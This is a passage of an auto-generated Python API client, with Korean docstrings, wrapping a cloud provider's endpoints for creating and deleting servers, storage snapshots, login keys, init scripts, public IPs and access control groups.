def create_block_storage_snapshot_instance_with_http_info(self, create_block_storage_snapshot_instance_request, **kwargs): # noqa: E501
"""create_block_storage_snapshot_instance # noqa: E501
블록스토리지스냅샷인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_snapshot_instance_with_http_info(create_block_storage_snapshot_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageSnapshotInstanceRequest create_block_storage_snapshot_instance_request: createBlockStorageSnapshotInstanceRequest (required)
:return: CreateBlockStorageSnapshotInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_block_storage_snapshot_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_block_storage_snapshot_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_block_storage_snapshot_instance_request' is set
if ('create_block_storage_snapshot_instance_request' not in params or
params['create_block_storage_snapshot_instance_request'] is None):
raise ValueError("Missing the required parameter `create_block_storage_snapshot_instance_request` when calling `create_block_storage_snapshot_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_block_storage_snapshot_instance_request' in params:
body_params = params['create_block_storage_snapshot_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createBlockStorageSnapshotInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateBlockStorageSnapshotInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_init_script(self, create_init_script_request, **kwargs): # noqa: E501
"""create_init_script # noqa: E501
초기화스크립트생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_init_script(create_init_script_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateInitScriptRequest create_init_script_request: createInitScriptRequest (required)
:return: CreateInitScriptResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_init_script_with_http_info(create_init_script_request, **kwargs) # noqa: E501
else:
(data) = self.create_init_script_with_http_info(create_init_script_request, **kwargs) # noqa: E501
return data
def create_init_script_with_http_info(self, create_init_script_request, **kwargs): # noqa: E501
"""create_init_script # noqa: E501
초기화스크립트생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_init_script_with_http_info(create_init_script_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateInitScriptRequest create_init_script_request: createInitScriptRequest (required)
:return: CreateInitScriptResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_init_script_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_init_script" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_init_script_request' is set
if ('create_init_script_request' not in params or
params['create_init_script_request'] is None):
raise ValueError("Missing the required parameter `create_init_script_request` when calling `create_init_script`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_init_script_request' in params:
body_params = params['create_init_script_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createInitScript', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateInitScriptResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_login_key(self, create_login_key_request, **kwargs): # noqa: E501
"""create_login_key # noqa: E501
로그인키생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_login_key(create_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateLoginKeyRequest create_login_key_request: createLoginKeyRequest (required)
:return: CreateLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_login_key_with_http_info(create_login_key_request, **kwargs) # noqa: E501
else:
(data) = self.create_login_key_with_http_info(create_login_key_request, **kwargs) # noqa: E501
return data
def create_login_key_with_http_info(self, create_login_key_request, **kwargs): # noqa: E501
"""create_login_key # noqa: E501
로그인키생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_login_key_with_http_info(create_login_key_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateLoginKeyRequest create_login_key_request: createLoginKeyRequest (required)
:return: CreateLoginKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_login_key_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_login_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_login_key_request' is set
if ('create_login_key_request' not in params or
params['create_login_key_request'] is None):
raise ValueError("Missing the required parameter `create_login_key_request` when calling `create_login_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_login_key_request' in params:
body_params = params['create_login_key_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createLoginKey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateLoginKeyResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_member_server_image_instance(self, create_member_server_image_instance_request, **kwargs): # noqa: E501
"""create_member_server_image_instance # noqa: E501
회원서버이미지인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_member_server_image_instance(create_member_server_image_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateMemberServerImageInstanceRequest create_member_server_image_instance_request: createMemberServerImageInstanceRequest (required)
:return: CreateMemberServerImageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_member_server_image_instance_with_http_info(create_member_server_image_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_member_server_image_instance_with_http_info(create_member_server_image_instance_request, **kwargs) # noqa: E501
return data
def create_member_server_image_instance_with_http_info(self, create_member_server_image_instance_request, **kwargs): # noqa: E501
"""create_member_server_image_instance # noqa: E501
회원서버이미지인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_member_server_image_instance_with_http_info(create_member_server_image_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateMemberServerImageInstanceRequest create_member_server_image_instance_request: createMemberServerImageInstanceRequest (required)
:return: CreateMemberServerImageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_member_server_image_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_member_server_image_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_member_server_image_instance_request' is set
if ('create_member_server_image_instance_request' not in params or
params['create_member_server_image_instance_request'] is None):
raise ValueError("Missing the required parameter `create_member_server_image_instance_request` when calling `create_member_server_image_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_member_server_image_instance_request' in params:
body_params = params['create_member_server_image_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createMemberServerImageInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateMemberServerImageInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_network_interface(self, create_network_interface_request, **kwargs): # noqa: E501
"""create_network_interface # noqa: E501
네트워크인터페이스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_network_interface(create_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateNetworkInterfaceRequest create_network_interface_request: createNetworkInterfaceRequest (required)
:return: CreateNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_network_interface_with_http_info(create_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.create_network_interface_with_http_info(create_network_interface_request, **kwargs) # noqa: E501
return data
def create_network_interface_with_http_info(self, create_network_interface_request, **kwargs): # noqa: E501
"""create_network_interface # noqa: E501
네트워크인터페이스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_network_interface_with_http_info(create_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateNetworkInterfaceRequest create_network_interface_request: createNetworkInterfaceRequest (required)
:return: CreateNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_network_interface_request' is set
if ('create_network_interface_request' not in params or
params['create_network_interface_request'] is None):
raise ValueError("Missing the required parameter `create_network_interface_request` when calling `create_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_network_interface_request' in params:
body_params = params['create_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_placement_group(self, create_placement_group_request, **kwargs): # noqa: E501
"""create_placement_group # noqa: E501
물리배치그룹생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_placement_group(create_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePlacementGroupRequest create_placement_group_request: createPlacementGroupRequest (required)
:return: CreatePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_placement_group_with_http_info(create_placement_group_request, **kwargs) # noqa: E501
else:
(data) = self.create_placement_group_with_http_info(create_placement_group_request, **kwargs) # noqa: E501
return data
def create_placement_group_with_http_info(self, create_placement_group_request, **kwargs): # noqa: E501
"""create_placement_group # noqa: E501
물리배치그룹생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_placement_group_with_http_info(create_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePlacementGroupRequest create_placement_group_request: createPlacementGroupRequest (required)
:return: CreatePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_placement_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_placement_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_placement_group_request' is set
if ('create_placement_group_request' not in params or
params['create_placement_group_request'] is None):
raise ValueError("Missing the required parameter `create_placement_group_request` when calling `create_placement_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_placement_group_request' in params:
body_params = params['create_placement_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createPlacementGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreatePlacementGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_public_ip_instance(self, create_public_ip_instance_request, **kwargs): # noqa: E501
"""create_public_ip_instance # noqa: E501
공인IP인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_public_ip_instance(create_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePublicIpInstanceRequest create_public_ip_instance_request: createPublicIpInstanceRequest (required)
:return: CreatePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_public_ip_instance_with_http_info(create_public_ip_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_public_ip_instance_with_http_info(create_public_ip_instance_request, **kwargs) # noqa: E501
return data
def create_public_ip_instance_with_http_info(self, create_public_ip_instance_request, **kwargs): # noqa: E501
"""create_public_ip_instance # noqa: E501
공인IP인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_public_ip_instance_with_http_info(create_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreatePublicIpInstanceRequest create_public_ip_instance_request: createPublicIpInstanceRequest (required)
:return: CreatePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_public_ip_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_public_ip_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_public_ip_instance_request' is set
if ('create_public_ip_instance_request' not in params or
params['create_public_ip_instance_request'] is None):
raise ValueError("Missing the required parameter `create_public_ip_instance_request` when calling `create_public_ip_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_public_ip_instance_request' in params:
body_params = params['create_public_ip_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createPublicIpInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreatePublicIpInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_server_instances(self, create_server_instances_request, **kwargs): # noqa: E501
"""create_server_instances # noqa: E501
서버인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_server_instances(create_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateServerInstancesRequest create_server_instances_request: createServerInstancesRequest (required)
:return: CreateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_server_instances_with_http_info(create_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.create_server_instances_with_http_info(create_server_instances_request, **kwargs) # noqa: E501
return data
def create_server_instances_with_http_info(self, create_server_instances_request, **kwargs): # noqa: E501
"""create_server_instances # noqa: E501
서버인스턴스생성 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_server_instances_with_http_info(create_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateServerInstancesRequest create_server_instances_request: createServerInstancesRequest (required)
:return: CreateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_server_instances_request' is set
if ('create_server_instances_request' not in params or
params['create_server_instances_request'] is None):
raise ValueError("Missing the required parameter `create_server_instances_request` when calling `create_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_server_instances_request' in params:
body_params = params['create_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_access_control_group(self, delete_access_control_group_request, **kwargs): # noqa: E501
"""delete_access_control_group # noqa: E501
ACG삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_access_control_group(delete_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteAccessControlGroupRequest delete_access_control_group_request: deleteAccessControlGroupRequest (required)
:return: DeleteAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_access_control_group_with_http_info(delete_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.delete_access_control_group_with_http_info(delete_access_control_group_request, **kwargs) # noqa: E501
return data
def delete_access_control_group_with_http_info(self, delete_access_control_group_request, **kwargs): # noqa: E501
"""delete_access_control_group # noqa: E501
ACG삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_access_control_group_with_http_info(delete_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteAccessControlGroupRequest delete_access_control_group_request: deleteAccessControlGroupRequest (required)
:return: DeleteAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_access_control_group_request' is set
if ('delete_access_control_group_request' not in params or
params['delete_access_control_group_request'] is None):
raise ValueError("Missing the required parameter `delete_access_control_group_request` when calling `delete_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_access_control_group_request' in params:
body_params = params['delete_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_block_storage_instances(self, delete_block_storage_instances_request, **kwargs): # noqa: E501
"""delete_block_storage_instances # noqa: E501
블록스토리지인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_instances(delete_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageInstancesRequest delete_block_storage_instances_request: deleteBlockStorageInstancesRequest (required)
:return: DeleteBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_block_storage_instances_with_http_info(delete_block_storage_instances_request, **kwargs) # noqa: E501
else:
(data) = self.delete_block_storage_instances_with_http_info(delete_block_storage_instances_request, **kwargs) # noqa: E501
return data
def delete_block_storage_instances_with_http_info(self, delete_block_storage_instances_request, **kwargs): # noqa: E501
"""delete_block_storage_instances # noqa: E501
블록스토리지인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_instances_with_http_info(delete_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageInstancesRequest delete_block_storage_instances_request: deleteBlockStorageInstancesRequest (required)
:return: DeleteBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_block_storage_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_block_storage_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_block_storage_instances_request' is set
if ('delete_block_storage_instances_request' not in params or
params['delete_block_storage_instances_request'] is None):
raise ValueError("Missing the required parameter `delete_block_storage_instances_request` when calling `delete_block_storage_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_block_storage_instances_request' in params:
body_params = params['delete_block_storage_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteBlockStorageInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteBlockStorageInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_block_storage_snapshot_instances(self, delete_block_storage_snapshot_instances_request, **kwargs): # noqa: E501
"""delete_block_storage_snapshot_instances # noqa: E501
블록스토리지스냅샷인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_snapshot_instances(delete_block_storage_snapshot_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageSnapshotInstancesRequest delete_block_storage_snapshot_instances_request: deleteBlockStorageSnapshotInstancesRequest (required)
:return: DeleteBlockStorageSnapshotInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_block_storage_snapshot_instances_with_http_info(delete_block_storage_snapshot_instances_request, **kwargs) # noqa: E501
else:
(data) = self.delete_block_storage_snapshot_instances_with_http_info(delete_block_storage_snapshot_instances_request, **kwargs) # noqa: E501
return data
def delete_block_storage_snapshot_instances_with_http_info(self, delete_block_storage_snapshot_instances_request, **kwargs): # noqa: E501
"""delete_block_storage_snapshot_instances # noqa: E501
블록스토리지스냅샷인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_block_storage_snapshot_instances_with_http_info(delete_block_storage_snapshot_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteBlockStorageSnapshotInstancesRequest delete_block_storage_snapshot_instances_request: deleteBlockStorageSnapshotInstancesRequest (required)
:return: DeleteBlockStorageSnapshotInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_block_storage_snapshot_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_block_storage_snapshot_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_block_storage_snapshot_instances_request' is set
if ('delete_block_storage_snapshot_instances_request' not in params or
params['delete_block_storage_snapshot_instances_request'] is None):
raise ValueError("Missing the required parameter `delete_block_storage_snapshot_instances_request` when calling `delete_block_storage_snapshot_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_block_storage_snapshot_instances_request' in params:
body_params = params['delete_block_storage_snapshot_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteBlockStorageSnapshotInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteBlockStorageSnapshotInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_init_scripts(self, delete_init_scripts_request, **kwargs): # noqa: E501
"""delete_init_scripts # noqa: E501
초기화스크립트삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_init_scripts(delete_init_scripts_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteInitScriptsRequest delete_init_scripts_request: deleteInitScriptsRequest (required)
:return: DeleteInitScriptsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_init_scripts_with_http_info(delete_init_scripts_request, **kwargs) # noqa: E501
else:
(data) = self.delete_init_scripts_with_http_info(delete_init_scripts_request, **kwargs) # noqa: E501
return data
def delete_init_scripts_with_http_info(self, delete_init_scripts_request, **kwargs): # noqa: E501
"""delete_init_scripts # noqa: E501
초기화스크립트삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
